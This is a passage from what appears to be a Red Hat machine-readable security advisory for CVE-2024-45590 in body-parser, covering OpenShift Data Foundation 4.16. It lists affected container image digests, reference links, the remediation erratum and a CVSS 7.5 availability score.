"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", 